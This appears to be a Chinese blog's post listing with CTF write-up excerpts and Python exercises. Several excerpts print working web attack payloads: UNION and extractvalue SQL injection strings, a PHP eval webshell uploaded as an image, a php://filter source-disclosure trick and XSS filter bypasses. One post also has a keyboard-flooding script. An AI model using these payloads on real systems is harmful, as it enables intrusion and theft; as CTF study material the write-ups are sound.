自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(50)
  • 收藏
  • 关注

原创 漏洞 复现

永恒之蓝(ms17_010)1.何为永恒之蓝?永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。2.什么是SMB协议?SMB(全称是Server Mes

2022-03-17 14:46:46 587

原创 ctfshow——web入门(sql注入)

web171爆库:1'union select 1,2,database()--+爆表:1'union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+爆列名:1'union select 1,2,group_concat(column_name)from information_schema.columns where table_name='c

2021-08-11 14:26:20 236

原创 python练习7.15

题目:有四个数字:1、2、3、4,能组成多少个互不相同且无重复数字的三位数?各是多少?程序分析:可填在百位、十位、个位的数字都是1、2、3、4。组成所有的排列后再去 掉不满足条件的排列。程序源代码:for i in range(1,5): for j in range(1,5): for k in range(1,5): if(i!=j and j!=k and i!=k): print(i,j,k)运行结果1

2021-07-15 14:10:35 228

原创 python练习7.13

黑科技简单的信息爆破,原理是模拟键盘发送信息,只需要打开想输入信息的页面选择输入框即可。import timefrom pynput.keyboard import Key,Controller#使用的第三方库def input(content): GLY=Controller()#设一个管理员 GLY.type(content)#让管理员输入内容 GLY.press(Key.enter)#让管理员按回车def main(number,content): time

2021-07-13 10:24:09 122

原创 python练习6.25

什么是正则表达式正则表达式是一个很强大的字符串处理工具,几乎任何关于字符串的操作都可以使用正则表达式来完成,是一个特殊的字符序列,用来判断一个字符串与我们所设定的字符序列是否相匹配。实现快速检索文本和一些替换文本的操作。在Python中我们有专门的正则表达式模块re,re 模块使 Python 语言拥有全部的正则表达式功能符号说明.匹配任意字符(不包括换行符)^匹配开始位置,多行模式下匹配每一行开始$匹配结束位置,多行模式下匹配每一行结束*匹配前一个元字符0

2021-06-25 11:14:41 144 1

原创 python练习6.24

懒人促进社会进步,这话说得一点都对,本以为利用类已经够简单了,竟然还有比它更方便的——类的继承什么是继承继承是类与类的一种关系,是一种子类与父类的关系,即爸爸与儿子,爸爸生个儿子,儿子继承爸爸的属性和方法。什么时候使用继承假如我需要定义几个类,而类与类之间有一些公共的属性和方法,这时我就可以把相同的属性和方法作为基类的成员,而特殊的方法及属性则在本类中定义。这样子类只需要继承基类(父类),子类就可以访问到基类(父类)的属性和方法了,它提高了代码的可扩展性和重用行。比如:猫狗都是动物,会叫,会吃饭饭

2021-06-24 09:11:43 69

原创 python练习6.23

代码就是为了方便大家,当你反复需要用到同样的使用同样的格式来定义时,最简单的方法就是使用类例如,录入学生信息时class manage(): def __init__(self,name,sex,age,id): self.name = name self.sex = sex self.age = age self.id = id def printinfo(self): print("姓名:",self.name,"

2021-06-23 09:24:44 86

原创 python练习6.22

什么是递归程序调用自身的编程技巧称为递归( recursion)。递归做为一种算法在程序设计语言中广泛应用。 一个过程或函数在其定义或说明中有直接或间接调用自身的一种方法,它通常把一个大型复杂的问题层层转化为一个与原问题相似的规模较小的问题来求解,递归策略只需少量的程序就可描述出解题过程所需要的多次重复计算,大大地减少了程序的代码量。递归的能力在于用有限的语句来定义对象的无限集合。一般来说,递归需要有边界条件、递归前进段和递归返回段。当边界条件不满足时,递归前进;当边界条件满足时,递归返回。理

2021-06-22 12:41:21 93

原创 python练习6.21

网络爬虫,也叫网络蜘蛛(Web Spider)。它根据网页地址(URL)爬取网页内容,而网页地址(URL)就是我们在浏览器中输入的网站链接。比如:https://www.baidu.com/,它就是一个URL。今天写一个简单的爬虫脚本,需要先安装requests库和Beautiful Soup库,安装好之后就可以进入实战了。以爬小说为例import requestsif __name__ == "__main__": get = 'https://www.biquge7.com/book/

2021-06-21 22:16:01 247

原创 BUGKU——安慰奖

昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下_wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试网站源码:www.zip.bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak)vim缓存:xxx.swp意外退出为xxx

2021-06-08 10:47:11 215

原创 BUUCTF——[极客大挑战 2019]PHP

打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(

2021-06-07 10:33:41 296 1

原创 BUUCTF——[极客大挑战 2019]HardSQL

打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。先爆库名:payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23得到库名爆表名:payload:?username=1&password=12

2021-06-01 10:18:02 227

原创 CTFshow——web入门(信息泄露)

web1 源码泄露直接 f12 在下面注释行中可以看到flagweb2 前台js绕过方法有很多:1.ctrl+u 查看源代码2.burp抓包查看3.在网址前加上view-source:即可查看源代码web3 协议头信息泄露题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flagweb4 robots后台泄露题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flagweb

2021-05-30 11:35:25 1391 3

原创 BUUCTF——[极客大挑战 2019]Http

打开题目是个网页,没有什么特别的,查看源代码发现Secret.php,利用burp抓包,提示我们该网页需要来自该网址修改referer头(没有自己添加上)进入到下一个环节,有提示我们说要使用这个浏览器,满足它就好了修改完之后又告诉我们要在本地阅读利用X-Forwarded-For:127.0.0.1就好了,拿到flag,每一步都有提示还是比较人性化的...

2021-05-29 10:26:57 86

原创 学习任意文件下载漏洞

什么是任意文件下载漏洞文件下载漏洞是指文件下载功能没有对下载的文件类型、目录做合理严谨的过滤,导致用户可以下载服务器的任意文件。任意文件下载漏洞的危害用户可以任意下载文件,例如脚本、代码服务器配置文件等。利用得到的代码进行审计分析有可能得到其它漏洞来进行攻击任意文件下载漏洞如何利用Google hacking上看inurl:"readfile.php?file="从链接上看:download.php?path=download.php?file=down.php?file=data.

2021-05-27 19:00:43 1174

原创 xss学习

学习小结- 一般做题思路就是闭合题目给出的函数来完成我们的弹窗- 反引号可以替换圆括号- <svg>标签中可以直接执行实体字符。<svg><script>alert&#40;1&#41;</script>- 换行可以绕过正则- 可以利用onclick,onmouseover等事件进行弹窗如:onclick=alert(1),onmouseover=alert(1)- 可以用换行来绕过“/ /”- <!-- -->和&

2021-05-27 10:26:31 297

原创 BUUCTF——[HCTF 2018]WarmUp

打开题目发现提示根据提示找到下一步,映入眼帘的是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单 if (! is

2021-05-26 19:55:00 217 3

原创 第二届金盾信安杯部分wp

1.注意数字打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag2.小火龙下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass手动分离得到压缩包,然后用密码打开得到flag3.我和十

2020-12-21 14:28:52 793

原创 日常练习之web([极客大挑战 2019]Secret File)

打开网页漆黑一片,显然是不想让我们看到什么,习惯性全选一下,发现第一道入口进去发现说把秘密都放在这里了,点开之后会跳到另一个网页,告诉我们已经看完了抓包看一下有没有什么关键信息跳转了,果然被我们发现 secr3t.php那我们就进去看看,是代码审计,但是告诉我们flag在flag.php中按照题目条件,让file=flag.php说看不到它,联想到php为协议,文件包含一下,构造payload?file=php://filter/read=convert.base64-encode/res

2020-12-15 10:19:15 125

原创 每日一题RE——flag都是爱你的形状

打开文件,是一个加密的压缩包和另一个提示文本,提示是什么加密需要两个密钥,很容易想到RSA,去网上找到解密工具,解码得到密码,打开压缩包是一个运行程序,这应该就是要逆的东西了。shift+f12查看所有,看到关键词和base64可能是ida版本问题,不能看到源码,f5没得用,但是找到了,str2加上前面的信息应该是要逆这串字符,贴上脚本import base64str="e3nifIH9b_C@n@dH"f=''flag=''for i in range(0,len(str)):

2020-12-09 22:29:27 209 1

原创 日常练习之web([ACTF2020 新生赛]Upload)

打开题目是一个灯泡,放上去会出现上传文件,但是只能上传jpg等图片类型的文件,很明显上传一个图片马<script language='php'>@eval($_POST['pass']);</script>放到txt里后缀名改成jpg格式,burp抓一下包,把jpg改成phtml绕过php检测这里可以看到上传成功拿出蚁剑或者菜刀连接你上传的木马在根目录下找到flagflag{1db8d2ff-bc9d-4d06-a4ef-94757f236712}...

2020-12-08 22:15:25 286

原创 日常练习之web(生日)

题目是某人的生日,给了一个登录框,用户只有admin,尝试用万能密码登录,行不通,于是就想到抓包爆破密码因为题目提示是生日所以就从1970-1999,生成一个生日字典进行爆破,得到密码。回到页面,登录拿到flagflag{01744832e0c01e4f77fa27382410af1e}!...

2020-12-08 21:21:11 386

原创 日常练习之web([RoarCTF 2019]Easy Calc)

题目要点:①var_dump()函数用于输出变量的相关信息;判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构②scandir()列出参数目录中的文件和目录③file_get_contents()把整个文件读入一个字符串中。④wafwaf不允许num传字母,我们可以加个空格它就无法识别“ num”和“num”,php在解析的时候,会先把空格给去掉,这样我们的

2020-12-08 20:03:50 121

原创 每日一题MISC——月亮和六便士

拿到题目,是一个加密压缩包,没得提示,看看题目名字,猜测应该是六位密码,于是拿去爆破,跑一会就出来了密码MaoMu解压压缩包,得到一张图片和另一个加密压缩包,图片上没啥信息,卡了一会,想着会不会是高度问题,就试了一下,出来moonin因为压缩软件问题导致我看不到,出题人的提示,卡了好一会,问了一下,原来是压缩包上有提示这就能解释通了,于是拿去掩码爆破一下就跑出来了打开压缩包,一个提示,一个全是英文的短文,根据提示可以猜到,我们找的信息应该都是大写字母组成,并且可以拼凑成单词或者短语之类的。于是

2020-12-08 17:40:54 412 1

原创 每日一题MISC——网愈

打开文件是两个doc文件和一个压缩包,然后打开一个,习惯性全选,发现有问题,找到一串字母应该是要栅栏或者凯撒,后面知道栅栏解密得到密码。GOODNIGHTSWEETIE打开第二个发现密码是六个字母和空格,直接掩码爆破一下,得到bmp是bmp隐写,没工具就没往下做了...

2020-12-07 21:37:56 158

原创 攻防世界MISC——hong

下载文件是个mp3,但是怎么也打不开,放winhex也看不出来啥,就想着分离一下试试,结果出来两张图片。一开始我以为这不是flag,就先去做二维码了,扫描二维码,出来一串字符,是python反编译,跑出来是Mr.hong。另一张图片上的就是本题答案,又被出题人师傅戏耍了一番,难过!!...

2020-12-03 17:56:45 791

原创 攻防世界MISC——message

打开题目是一串十六进制,把它转成二进制,然后放入world里面,发现有1679个字符,1679=23*73,以每73个字符为一行进行排列,然后把0换成比较明显的符号全部选中,缩小段行距,得到flag建议打死出题人,眼睛都要瞎了,不过,这道题对近视的人很友好,不信摘下眼镜试试,O(∩_∩)O哈哈~flag: RCTF{ArEciBo_mEsSaGe}...

2020-12-03 17:28:45 1152 1

原创 每日一题MISC--有手就行

下载附件是一张jpg图片,放入winhex里面查看,发现后面有pk字样猜测有压缩包,还有一串编码应该是bease64分离得到压缩包,base64解码得到密码,打开压缩包是两张图片,一张jpg,一张png,png看内容提示应该是高度问题改一下高度得到key然后把另一张jpg图片放入winhex,查看到结尾发现有一大段字符串,手动分离出来,看到有py字样应该是pyc文件保存改一下后缀去网上找工具反编译一下得到一串python代码感觉很乱,根本看不出来,本来想找人看看代码,但是大佬给了提示说,输出的

2020-12-02 20:12:01 228 1

原创 每日一题MISC——length3

打开题目,出题人并没有给什么明确的提示,但是可以从压缩文件中看出东西来压缩后的文件很小,并且都是3个字节,这就很容易想到是crc碰撞了。废话不多说,直接上脚本跑import datetimeimport binasciidef showTime(): print datetime.datetime.now()def crack(): crcs = set([0x5FC2CE98, 0x28C5FE0E, 0x831D751B, 0x8AAB3930, 0x3D0

2020-12-01 20:03:21 134

原创 攻防世界(web)高手进阶

1.baby_web打开题目,题目描述提示想想初始页面,打开是1.php,改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flagflag{very_baby_web}2.Training-WWW-Robots看到题目想到robots.txt,尝试一下果然,看到fl0g.php打开fl0g.php,拿到flagcyberpeace{27ec35e088ca35fa208f904330c15aad}3.warmup打开题目是个滑稽的表情,f12发现sou

2020-12-01 19:43:20 208

原创 日常练习之web(攻防世界favorite_number)

打开题目php代码映入眼帘,看到有提示版本,应该是版本漏洞是个判断数组强等于,又要首元素不等,然后正则要求整个字符串都是数字搜寻php5.5.9版本漏洞,有关php数组key溢出,看了大佬们的解释,有点明白,又有点不明白先放payloadstuff[4294967296]=admin&stuff[1]=user&num=123按照询问大佬的解释和网上查阅的资料,我的理解是计算机操作系统是32位的,那它最多的就是[2^31],这里的[4294967296=2 ^32 ]所以就会存在

2020-12-01 12:16:00 250

原创 每日一题MISC——veryeasy

打开压缩包,有一个txt文件和一个被加密的压缩包,txt里面是一串没见过的编码,在网上找了好久,都没有找到这种编码类型,求助大佬,大佬说是xx(后来问大佬怎么看出来的,大佬说它是一个一个试的,hhh),解出来是一段一文字母猜测可能是栅栏或者是凯撒,试了一下,是凯撒第三栏打开压缩包,文件名提示是re,用ida打开,不会做啊。。后来又问大佬,只得到一句话shift+f12,查看所有字符串得到flag...

2020-11-30 20:39:32 306

原创 日常练习之web(极客大挑战 2019 Upload)

看题目是一件文件上传题,让上传头像,那就传个一句话木马常用的木马网上也有,这里给出一个这道题用的一个GIF89a? <script language="php">eval($_REQUEST[pass])</script>一般绕过后缀名检测有php,php3,php5,pht,phtml等几种类型,这里采用phtml上传成功,拿出蚁剑连接一下http://xxx(题目的链接)/upload/22.phtml成功后选择在虚拟终端打开,cat flag拿到flag{4

2020-11-30 20:26:06 107 1

原创 日常练习之web(极客大挑战 2019 BuyFlag)

打开题目没看懂,让干嘛的,在右上角发现pyflag字样点进去看看,也没啥有用的信息,f12看一下源码发现提示需要post传入password和money,要让password=404 ,发现函数is_numeric,去学习一下说白了就是一个判断变量的函数,空格,%00,%20,这类的都可以绕过,后来我自己试验了一下发现这道题404后面跟一个字符(a,b,!,*等等可以自己试一下)也可以绕过,先传参抓包。出现一个user=0,给他改成user=1。如果你money不够多就会出现loser太惨了

2020-11-30 17:40:18 160

原创 每日一题web--想你而来的flag

?id=-1//uNiOn//sEleCt//1,2,group_concat(flag)Frfromom//flag

2020-11-29 15:58:04 275

原创 攻防世界(MISC)高手进阶

Recover-Deleted-File下载文件修改文件后缀名为zip,解压文件得到disk-image,在linux里打开执行命令extundelete disk-image --restore-all 恢复误删文件然后提权运行里面的flag文件得到flag提权chmod +x flag运行打开 ./flag得到flag:de6838252f95d3b9e803b28df33b4baa...

2020-11-29 15:02:13 258 1

原创 日常练习之web(BackupFile)

打开题目只有一句话查看源码无果抓包无果卡了很久,无奈只好去寻wp,找到index.php.bak备份文件,代码审计发现是php弱比较要让 key=str这里只需要key=123即可得到flagflag{4538b12f-1733-4c4c-99d7-e6ba9dbc0daf}...

2020-11-29 13:56:24 174

原创 攻防世界(MISC)高手进阶

1.打野拿到图片放入kali,用zsteg查看图片得到flagflag:qwxf{you_say_chick_beautiful?}zsteg真的很强大,大部分隐写都能解决zsteg安装git clone https://github.com/zed-0xff/zstegcd zsteg/gem install zsteg2.倒立屋打开图片放入stegsolve里面查看发现flag得到了flag结合题目,倒立一下:9102_cCsI3.2017_Dating_in_Singapo

2020-11-28 13:09:39 477

原创 日常练习之web(新生赛 Include)

打开题目点击链接,会跳转到这个页面抓包看看也没什么东西,求助大佬,大佬说是PHP为协议,上经典payload?file=php://filter/read=convert.base64-encode/resource=flag.php得到一串base64拿去解密得到flagphp://filter 伪协议该伪协议就是将原本看不到的php源代码进行base64编码再输出...

2020-11-27 19:57:35 83

原创 攻防世界(MISC)高手进阶

1.What-is-this连着提取几个压缩包后,得到两个图片,可能是盲水印或者图片合成,尝试了一下图片合成直接得到flagflag:AZADI TOWER2.再见李华题目是一个图片,上面有MD5但是有一段看不清,formost分离出一个压缩包,但是需要密码,回头看看题目说要署名,想到掩码攻击,但是总共有几位呢,看到不少于1000字,1000是二进制的8,于是尝试八位????lihua,无果,尝试九位?????lihua,得到密码,打卡压缩包,得到flag:Stayhungry,Stayfoolis

2020-11-27 18:57:22 782

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除